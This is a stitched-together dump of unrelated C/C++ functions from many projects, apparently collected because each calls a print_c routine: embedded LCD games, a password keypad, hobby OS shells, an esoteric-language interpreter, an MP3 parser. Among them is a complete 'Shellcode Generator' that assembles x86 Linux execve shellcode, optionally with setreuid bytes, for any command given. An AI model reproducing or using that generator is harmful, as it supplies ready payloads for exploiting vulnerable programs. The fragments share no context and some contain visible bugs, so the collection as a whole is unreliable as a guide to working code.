/* ******************************************************** mensel - create selectors for menu, then return cursor to first char of menu character ******************************************************** */ void mensel(int x, int y, int leng){ pos(x-2,y); print_c(0b00010000); pos(x+leng+1,y); print_c(0b00010001); pos(x,y); }
void tdisp() { int digit = 0; char d = 0; pmsglcd("RT = ", 5, LINE1); digit = react / 100; print_c(digit + 48, LINE1+0x04); digit = (react / 10) % 10; print_c(digit + 48, LINE1+0x05); digit = react % 10; print_c(digit + 48, LINE1+0x06); pmsglcd("ms", 2, LINE1+0x07); if(react <= 250) { GREEN = 1; } }
void pmsglcd(char * arr, int length, int startpos) { int i = 0; for (i = 0; i < length; i++) { print_c(arr[i], startpos + i); } }
/* *********************************************************************** pmsglcd: print character string str[] on LCD *********************************************************************** */ void pmsglcd(char str[]) { char counterp=0; while(str[counterp]!=0x00){ print_c(str[counterp]); counterp=counterp+1; } }
void OLEDClass::print(uint8_t x, uint8_t y, char* str, CharMode mode) { while (x <= (128 - (128 % mode) - mode) && *str != '\0') //计算最后一位可写位 && 循环输出字符 { print_c(x, y, *str, mode); x += mode; str++; } }
/** Require "usart.h" for print. **/ int show_dirlist_romfs(char* path){ uint32_t cursor; int type; /* 1. Make sure the path is exist. */ cursor = findnode_romfs(path); if(!cursor) return 0; /* 2. If it's a link, link to destination */ type = ROMFH_TYPE(cursor); if(type == ROMFH_HRD) while(ROMFH_TYPE(cursor) == ROMFH_HRD) cursor = ROMFS_BEGIN + ROMFH_INFO(cursor); /* 3. Make sure thar it's a dictionary. */ type = ROMFH_TYPE(cursor); if(type != ROMFH_DIR) return 0; /* 4. List all files in the dictionary by linking list structure. */ cursor = ROMFS_BEGIN + ROMFH_INFO(cursor); int count = 0; do{ print_str((char*)(cursor+OFFSET_NAME)); //get address of next file header if(!ROMFH_NEXTFH(cursor)) break; cursor = ROMFS_BEGIN + ROMFH_NEXTFH(cursor); count++; if(count%5) print_c('\t'); else print_c('\n'); }while(cursor); if(count%5) print_c('\n'); return 1; }
void do_op(char C) { switch(C) { case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': push(C-'0'); break; case '+': addition(); break; case '-': subtraction(); break; case '*': multiplication(); break; case '/': division(); break; case '%': modulo(); break; case '^': north(); break; case '>': east(); break; case 'V': case 'v': south(); break; case '<': west(); break; case '?': spin(); break; case '!': lnot(); break; case '`': gt(); break; case '_': hif(); break; case '|': vif(); break; case '"': tsm(); break; case ':': dup(); break; case '\\': swap(); break; case '$': chomp(); break; case '#': jump(); break; case 'p': put(); break; case 'g': get(); break; case 'H': gate(); break; case '.': print_i(); break; case ',': print_c(); break; case '&': input_i(); break; case '~': input_c(); break; case '@': hacf(); break; case '{': left_b(); break; case '}': right_b(); break; case '[': carry_l(); break; case ']': carry_r(); break; case ';': empty(); break; case 'O': portal_o(); break; case 'B': portal_b(); break; default: /* DO NOTHING! */ break; } }
void Clocks::print( std::ostream& o ) const { for ( unsigned int i = 0; i < dim; i++ ) if ( data[ i * dim + i ] != dbm_LE_ZERO ) { o << "empty\n"; return; } unsigned int printed = 0; for ( unsigned int i = 1; i < dim; i++ ) rowFmt( o, printed, print_c( o, i ) ); for ( unsigned int i = 1; i < dim; i++ ) for ( unsigned int j = i + 1; j < dim; j++ ) rowFmt( o, printed, print_d( o, i, j ) ); o << "\n"; }
void do_mouse(void){ static unsigned char mousecount=0; mousemoves=0; if ((inb(0x64) & 0x01) != 0) { mouse_byte[mousecount++]=inb(0x60); if (mousecount >= 3+mouse_haswheel) { mousecount=0; mousemoves=1; } } print_c('0'+mousecount, WHITE, BLACK); //vesa_draw_string(0,180,"aaddddddddddddddddtt"); outb(0x20,0x20); outb(0x20,0xA0); }
////////////////////////////// The main land ////////////////////////////// int main(int argc, char* argv[]){ int flags[6] = {0,0,0,0,0,0}; //flags = [t | n | p | v | c | q ] int num_thread=0, num_astr=0 ; obj *astr; thread_info t_info; int t = 1; // t is a preiod of time measure in a second int max_t=1000; thread_argv *targv; pthread_t *t_id; argv_handler(argc, argv, flags); prompt(&num_thread, &num_astr, &t_info, &astr, flags, &max_t); ini_astr(num_astr, astr); targv = malloc(sizeof(thread_argv)*num_thread); for(int a = 0; a < num_thread; a++){ targv[a].num_astr = num_astr; targv[a].astr = astr; targv[a].t_info = malloc(sizeof(thread_info)); targv[a].t = t; } //FIXME: while time steps goes here for(int time = 0; time < max_t; time++){ pthread_barrier_init(&barrier, NULL, num_thread); t_id = hive(num_thread, targv ); for(int k=0; k<num_thread; ++k){ if(pthread_join(t_id[k],NULL)!=0){ perror("The Hive Cluster is under attcked"); exit(EXIT_FAILURE); } } pthread_barrier_destroy(&barrier); if(time == 0 || time == max_t-1){ if(flags[3]==1) print_all(num_astr, astr, time); if(flags[4]==1) print_c(num_astr, astr, time); if(flags[5]==1) print_q(num_thread, targv,time); } } return 0; }
void print_l(list *l){ assert(l != NULL); if(l->first == NULL){ print_sep('-'); printf("Empty list\n"); }else{ node_l *n = l->first; while(n != NULL){ print_sep('-'); print_c(n->c); n = n->next; } } print_sep('-'); }
void scanf(char* text,COLOUR fg, COLOUR bg){ char j; char i,x,y; for(i=0;i< BUFFER_SIZE;++i){ (*crtscr).kbbuffer[i]=0; } i=0; x=(current->x); y=(current->y); (*crtscr).getkey=1; (*crtscr).enter=0; (*crtscr).buf=0; (*crtscr).del=0; while((*crtscr).enter==0){ if(crtscr==live){ set_cursor(x,y); if ((*crtscr).del>0){ for(i=0;i<=(*crtscr).buf;i++){ print_c(' ',fg,bg); } } (*crtscr).del=0; set_cursor(x,y); put(&(*crtscr).kbbuffer,fg,bg); if(i<(*crtscr).buf) i++; } } (*crtscr).getkey=0; (*crtscr).enter=0; j=memcpy(text, &((*crtscr).kbbuffer),BUFFER_SIZE); }
/* ******************************************************** minejoy - controls joy interactions during game stage ******************************************************** */ void minejoy(void){ if(joymove != 0){ if(joymove == 2){ if(irow != 0){ irow--; } } if(joymove == 4){ if(icol != 0){ icol--; } } if(joymove == 6){ if(icol != (NCOL - 1)){ icol++; } } if(joymove == 8){ if(irow != (NROW - 1)){ irow++; } } pos(icol,irow); //x,y //mask[y][x] if(mask[irow][icol] == 9){ //fog o war pmsglcd("#"); }else if(gameMode == 0 && mask[irow][icol] == 0){ //blank pmsglcd(" "); }else if(gameMode == 0 && mask[irow][icol] >= 1 && mask[irow][icol] <= 8){ //num dumb = 30 + mask[irow][icol]; print_c(dumb); }else if(gameMode == 1 && mask[irow][icol] == 10){ //F pmsglcd("F"); }else if(gameMode == 2 && mask[irow][icol] == 11){ //? pmsglcd("?"); } } nclick = GameControl(irow,icol,nclick,mine,mask); }
/* printable char */ static void pln(void) { static const char key_map[0x3a][2] = { /*00*/{0x0, 0x0}, {0x0, 0x0}, {'1', '!'}, {'2', '@'}, /*04*/{'3', '#'}, {'4', '$'}, {'5', '%'}, {'6', '^'}, /*08*/{'7', '&'}, {'8', '*'}, {'9', '('}, {'0', ')'}, /*0c*/{'-', '_'}, {'=', '+'}, {'\b','\b'},{'\t','\t'}, /*10*/{'q', 'Q'}, {'w', 'W'}, {'e', 'E'}, {'r', 'R'}, /*14*/{'t', 'T'}, {'y', 'Y'}, {'u', 'U'}, {'i', 'I'}, /*18*/{'o', 'O'}, {'p', 'P'}, {'[', '{'}, {']', '}'}, /*1c*/{'\n','\n'},{0x0, 0x0}, {'a', 'A'}, {'s', 'S'}, /*20*/{'d', 'D'}, {'f', 'F'}, {'g', 'G'}, {'h', 'H'}, /*24*/{'j', 'J'}, {'k', 'K'}, {'l', 'L'}, {';', ':'}, /*28*/{'\'','\"'},{'`', '~'}, {0x0, 0x0}, {'\\','|'}, /*2c*/{'z', 'Z'}, {'x', 'X'}, {'c', 'C'}, {'v', 'V'}, /*30*/{'b', 'B'}, {'n', 'N'}, {'m', 'M'}, {',', '<'}, /*34*/{'.', '>'}, {'/', '?'}, {0x0, 0x0}, {'*', '*'}, /*38*/{0x0, 0x0}, {' ', ' '} }; if (scan_code & 0x80) return; print_c(key_map[scan_code&0x7f][shf_p], WHITE, BLACK); }
void U_USART1::print(uint8_t* data) { while (*data != '\0') { print_c(*data); ++data; } }
int main(int argc, char *argv[]){ char cmd[255], *a; FILE *c; int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2; __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0}; if(argc<2){ printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" "| Shellcode Generator |\n" "| by certaindeath |\n" "| |\n" "| Usage: ./generator <cmd> |\n" " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); _exit(1); } a=(char *)malloc((9+strlen(argv[1]))*sizeof(char)); //find the command path a[0]=0; strcat(a, "whereis "); strcat(a, argv[1]); c=popen(a, "r"); while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c))); while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c))); cmd[--k]=0; if(k==0){ printf("No executables found for the command \"%s\".\n", argv[1]); _exit(1); } if(strlen(cmd)>254){ printf("The lenght of the command path can't be over 254 bye.\n"); _exit(1); } for(i=2;i<argc;i++) if(strlen(argv[i])>254){ printf("The lenght of each command argument can't be over 254 byte.\n"); _exit(1); } //work out the final shellcode lenght b=(k%2); b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2); totl+=(6+5*((k-(k%4))/4)+4*b1+7*b); for(i=2; i<argc;i++){ k=strlen(argv[i]); b=(k%2); b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2); totl+=(6+5*((k-(k%4))/4)+4*b1+7*b); } totl+=4*(argc-2); printf("Shellcode lenght: %i\n", totl); //build the shellcode shc=(__u8 *)malloc((totl+1)*sizeof(__u8)); memcpy(shc, start, 2); if(SETRUID){ memcpy(shc+shp, struid, 10); shp+=10; } if(argc>2) push_shc(shc, argv[argc-1], &shp); else push_shc(shc, cmd, &shp); memset(shc+(shp++), 0x89, 1); memset(shc+(shp++), 0xe6, 1); if(argc>2){ for(i=argc-2;i>1;i--) push_shc(shc, argv[i], &shp); push_shc(shc, cmd, &shp); } memset(shc+(shp++), 0x50, 1); memset(shc+(shp++), 0x56, 1); if(argc>2){ for(i=argc-2;i>1;i--){ memset(shc+(shp++), 0x83, 1); memset(shc+(shp++), 0xee, 1); memset(shc+(shp++), strlen(argv[i])+1, 1); memset(shc+(shp++), 0x56, 1); } memset(shc+(shp++), 0x83, 1); memset(shc+(shp++), 0xee, 1); memset(shc+(shp++), strlen(cmd)+1, 1); memset(shc+(shp++), 0x56, 1); } memcpy(shc+shp, end, 16); print_c(shc,totl); return 0; }
/* *********************************************************************** Main - Setup *********************************************************************** */ void main(void) { /* put your own code here */ DisableInterrupts; initializations(); EnableInterrupts; //printf("%ld\n",time(0)); //prints time elapsed since 1970 Initial_board(mine); Initial_mask(mask); /* *********************************************************************** Main - Loop *********************************************************************** */ for(;;) { PTT_PTT3 = display1_en; //display1_en = 1 means PTT_PTT3 = 0 (en) PTT_PTT5 = !display2_en; //display2_en = 1 means PTT_PTT5 = 0 (en) //butts(); if(diffrun == 0 && gamerun == 0){ //splash screen if(setflag == 1){ send_i(LCDCLR); splashDisp(); setflag = 0; } if(buttBpb){ //buttBpb (FLAG), as opposed to buttBatd diffrun = 1; setflag = 1; } } if(diffrun == 1 && gamerun == 0){ //difficulty screen if(setflag == 1){ send_i(LCDCLR); diffDisp(); setflag = 0; } difficulty(); if(buttBpb){ gamerun = 1; diffrun = 0; setflag = 1; } } if(diffrun == 0 && gamerun == 1){ if(setflag == 1){ send_i(LCDCLR); Create_board(nbomb,mine); joymove = 99; setflag = 0; } //printf("Mask: \n"); if(joymove != 0){ for(i = 0; i < NROW; i++){ for(j = 0; j < NCOL; j++){ //printf("%2d ",mask[i][j]); pos(i,j); if(mask[i][j] == 9){ pmsglcd("?"); }else if(mask[i][j] == 0){ pmsglcd(" "); }else if(mask[i][j] >= 1 && mask[i][j] <= 8){ dumb = 30 + mask[i][j]; print_c(dumb); }else if(mask[i][j] == 10){ pmsglcd("F"); } } //printf("\n"); } } joymove = joy(); if(joymove == 2){ if(irow != 0){ irow--; } } if(joymove == 4){ if(icol != 0){ icol--; } } if(joymove == 6){ if(icol != (NCOL - 1)){ icol++; } } if(joymove == 8){ if(icol != (NROW - 1)){ irow++; } } nclick = GameControl(irow,icol,nclick,mine,mask); } if(nclick == -1){ fail = 1; for(a = 0; a < NROW; a++){ for(b = 0; b < NCOL; b++){ mask[a][b] = mine[a][b]; } } } //printf("Number Click: %d\n",nclick); nflag = FlagControl(frow,fcol,nflag,mask); if((nflag + nclick) == nbomb){ win = 1; } //printf("Number Flag: %d\n",nflag); //printf("Flag: \n"); for(i = 0; i < NROW; i++){ for(j = 0; j < NCOL; j++){ //printf("%2d ",mask[i][j]); } //printf("\n"); } //printf("Mine: \n"); for(i = 0; i < NROW; i++){ for(j = 0; j < NCOL; j++){ //printf("%2d ",mine[i][j]); } //printf("\n"); } /* //If the left pushbutton if(leftpb && !gamerun){ leftpb = 0; gamerun = 1; send_i(LCDCLR); //display message pmsglcd("Ready, Set..."); } //If the right pushbutton if(rghtpb && gamerun){ rghtpb = 0; gamerun = 0; } */ } /* loop forever */ /* please make sure that you never leave main */ }
void fault_handler(struct regs * r){ print_c('X'); print_c('Y'); for(;;); }
void get_line P1C(file_index,i) #line 619 "../../../texk/web2c/tiedir/tie.w" {register input_description*inp_desc= input_organization[i]; if(inp_desc->mode==ignore)return; if(feof(inp_desc->the_file)) /*25:*/ #line 630 "../../../texk/web2c/tiedir/tie.w" { inp_desc->mode= ignore; inp_desc->limit= -1; if(inp_desc->type_of_file==master)input_has_ended= true; return; } /*:25*/ #line 622 "../../../texk/web2c/tiedir/tie.w" /*27:*/ #line 655 "../../../texk/web2c/tiedir/tie.w" {int final_limit; int c; /*28:*/ #line 679 "../../../texk/web2c/tiedir/tie.w" incr(inp_desc->line); if(inp_desc->type_of_file==master&&inp_desc->line%100==0){ if(inp_desc->line%500==0)print2("%ld",inp_desc->line); else print_c('.'); update_terminal; } /*:28*/ #line 659 "../../../texk/web2c/tiedir/tie.w" inp_desc->limit= final_limit= 0; while(inp_desc->limit<buf_size){ c= fgetc(inp_desc->the_file); /*29:*/ #line 696 "../../../texk/web2c/tiedir/tie.w" if(c==EOF){ if(inp_desc->limit<=0){ inp_desc->mode= ignore; inp_desc->limit= -1; if(inp_desc->type_of_file==master)input_has_ended= true; return; }else{ c= nl_mark; break; } } /*:29*/ #line 664 "../../../texk/web2c/tiedir/tie.w" inp_desc->buffer[inp_desc->limit++]= c= map_xord(c); if(c==nl_mark)break; if(c!=32&&c!=tab_mark) final_limit= inp_desc->limit; } /*30:*/ #line 712 "../../../texk/web2c/tiedir/tie.w" if(c!=nl_mark){ err_print("! Input line too long")(i); while((c= fgetc(inp_desc->the_file))!=EOF&&map_xord(c)!=nl_mark) do_nothing; } /*:30*/ #line 670 "../../../texk/web2c/tiedir/tie.w" inp_desc->limit= final_limit; } /*:27*/ #line 623 "../../../texk/web2c/tiedir/tie.w" }
void print(cyOS::vector <char> input){ input.push_back('\0'); input.push_back('\0'); print_c(input.begin(), input.size()); }
void start(){ cyOS::vector <char> buffer; cyOS::vector <char> input; char user[16] = "root@cyOS:$ \0\0"; uint name = 12; uint pos = name; uint line = 0; char c; KEY k; text_graphics::set_cursor_pos(name); while (true){ //clears screen, prints current input, and then waits for key press text_graphics::clear(); print_line(user, name, input, line); k = keyboard::get_key(); //non-character keys move cursor around screen and also position in buffer if (!is_key_printable(k)) { if ( (k == KEY_LEFT) && (text_graphics::cursor_pos() > name) ){ cursor_decrement(); pos--; } else if ( (k == KEY_RIGHT) && (text_graphics::cursor_pos() < input.size()+name) ){ cursor_increment(); pos++; } else if ( (k == KEY_UP) && (text_graphics::cursor_pos() > text_graphics::cols())){ text_graphics::set_cursor_pos(text_graphics::cursor_pos()-text_graphics::cols()); pos -= text_graphics::cols(); } else if ( (k == KEY_DOWN) && (input.size() > text_graphics::cols()) && (text_graphics::cursor_pos()+text_graphics::cols()-1 < input.size()) ){ text_graphics::set_cursor_pos(text_graphics::cursor_pos()+text_graphics::cols()); pos += text_graphics::cols(); } //should be KEY_DELTE else if ( (k == KEY_F12) && (pos < name+input.size())){ text_graphics::put_char(' ', pos); input.erase(pos-name); //print(input); } else if (k == KEY_HOME){ text_graphics::set_cursor_pos(name); pos = name; } //should be KEY_END else if (k == 1060480){ text_graphics::set_cursor_pos(input.size()); pos = input.size(); } } else{ c = keyboard::get_char(); //backspace if (c == '\b'){ //if position is in the user's name, put it at the end of the user's name if (pos <= name){ text_graphics::set_cursor_pos(name); pos = name; } //otherwise delete the previous character from the vector else { //text_graphics::put_char(' ', pos-1); if (input.size() > 0){ cursor_decrement(); pos--; } if (pos-name == input.size()){ input.pop_back(); } else{ input.erase(pos-name); } } } //return/new line else if (c == '\n' && pos == input.size()){ text_graphics::clear(); print_line(user, name, input, ++line); text_graphics::set_cursor_pos(name); if(function_call(input)==true){ text_graphics::clear(); char escape[] = "Exiting Shell...\0\0"; print_c(escape); return; } pos = name; } //Checks for new line in middle of input else { if (c == '\n' || c== '\r') c = '\0'; /*if (pos-name == input.size()){ text_graphics::put_char(c, text_graphics::cursor_pos()); input.push_back(c); } else{*/ input.insert(pos-name, c); //insert into input string if (c == '\0'){ text_graphics::clear(); function_call(input); //parses and executes pos = name; input.clear(); } pos++; cursor_increment(); } } //keeping cursor on the screen if (text_graphics::cursor_pos() < name){ text_graphics::set_cursor_pos(name); pos = name; } else if (text_graphics::cursor_pos() > (text_graphics::cols()*text_graphics::rows()) ){ text_graphics::set_cursor_pos(text_graphics::cols()*text_graphics::rows()); pos = text_graphics::cols()*text_graphics::rows(); } } }
void mp3_c(u8 c){ int i; static int over=0; if (cur_song.content_length == 0 || cur_song.content_remain == -1){ print_c(c); if (c != '\n'){ if (cur_song.buffer_idx < sizeof(cur_song.buffer)){ cur_song.buffer[cur_song.buffer_idx++] = c; } }else{ char * s = cur_song.buffer; if (s[0] == 'C' && s[1] == 'o' && s[2] == 'n' && s[3] == 't' && s[4] == 'e' && s[5] == 'n' && s[6] == 't' && s[7] == '-' && s[8] == 'L' && s[9] == 'e' && s[10]== 'n' && s[11]== 'g' && s[12]== 't' && s[13]== 'h' && s[14]== ':'){ i = 16; while (i < 50 && s[i] >= '0' && s[i] <= '9'){ cur_song.content_length = cur_song.content_length * 10 + (s[i] - '0'); i++; } printf("-----content_length: %d\r\n",cur_song.content_length); } if (s[0]='\r' && cur_song.buffer_idx ==1 && cur_song.content_length > 0){ cur_song.content_remain = cur_song.content_length; println("content_start"); } cur_song.buffer_idx = 0; } }else{ if (cur_song.content_remain > 0){ // printf("%d\r\n",cur_song.content_remain); cur_song.content_remain--; cur_song.buffer[cur_song.buffer_idx++] = c; if (cur_song.content_length_without_id3v2 == 0 && cur_song.buffer_idx > 9){ if (cur_song.buffer[0] == 0x49 && cur_song.buffer[1] == 0x44 && cur_song.buffer[2] == 0x33 ){ cur_song.content_length_without_id3v2 = cur_song.content_length - ((cur_song.buffer[6]&0x7F)*0x200000+(cur_song.buffer[7]&0x7F)*0x4000+(cur_song.buffer[8]&0x7F)*0x80+(cur_song.buffer[9]&0x7F) + 10); }else{ cur_song.content_length_without_id3v2 = cur_song.content_length; cur_song.first_head[0] = cur_song.buffer[0]; cur_song.first_head[1] = cur_song.buffer[1]; cur_song.first_head[2] = cur_song.buffer[2]; cur_song.first_head[3] = cur_song.buffer[3]; cur_song.headed = 4; } } if (cur_song.headed < 4 && cur_song.content_length_without_id3v2 > cur_song.content_remain ){ cur_song.first_head[cur_song.headed++] = c; } if (cur_song.headed >= 4 && cur_song.frame_size == 0){ for(i=0;i<4;i++) printf("0x%02x ",cur_song.first_head[i]); cur_song.frame_size = calc_frame_size(cur_song.first_head); printf("frame_size: %d\r\n",cur_song.frame_size); } }else{ println("shot over"); printf("content_over %d\r\n",over++); } } }
void U_USART1::print(uint8_t* data, uint16_t len) { while (len--) { print_c(*data); ++data; } }
/* *********************************************************************** Main *********************************************************************** */ void main(void) { DisableInterrupts; initializations(); EnableInterrupts; //shiftout(0x01); while(flag == 0 && counter_pass < 3) { chgline(0x80); pmsglcd("Enter Password"); if(rghtpb == 0) { chgline(0xc0 + counter_pass); tempo = atd_convert() ; print_c(tempo); } if(rghtpb == 1) { rghtpb = 0; temp[counter_pass] = atd_convert() - 48; counter_pass++; } if(counter_pass == 3) { for(i = 0; i < 3; i++) { if(our_pass[i] == temp[i]) { if(flag2 != 1) { flag = 1; } } else { flag2 = 1; flag = 0; counter_pass = 0; temp[0] = 0; temp[1] = 0; temp[2] = 0; chgline(0xc0); send_i(LCDCLR); } } } } send_i(LCDCLR); pmsglcd("Success"); TIE_C7I = 1; //print_c(tempo); for(;;) { /* write your code here */ } /* loop forever */ }/* do not leave main */
static int _cut_c(const struct cut_option *op, char *data) { (void) print_c(data, op->c.min, op->c.max); return 0; }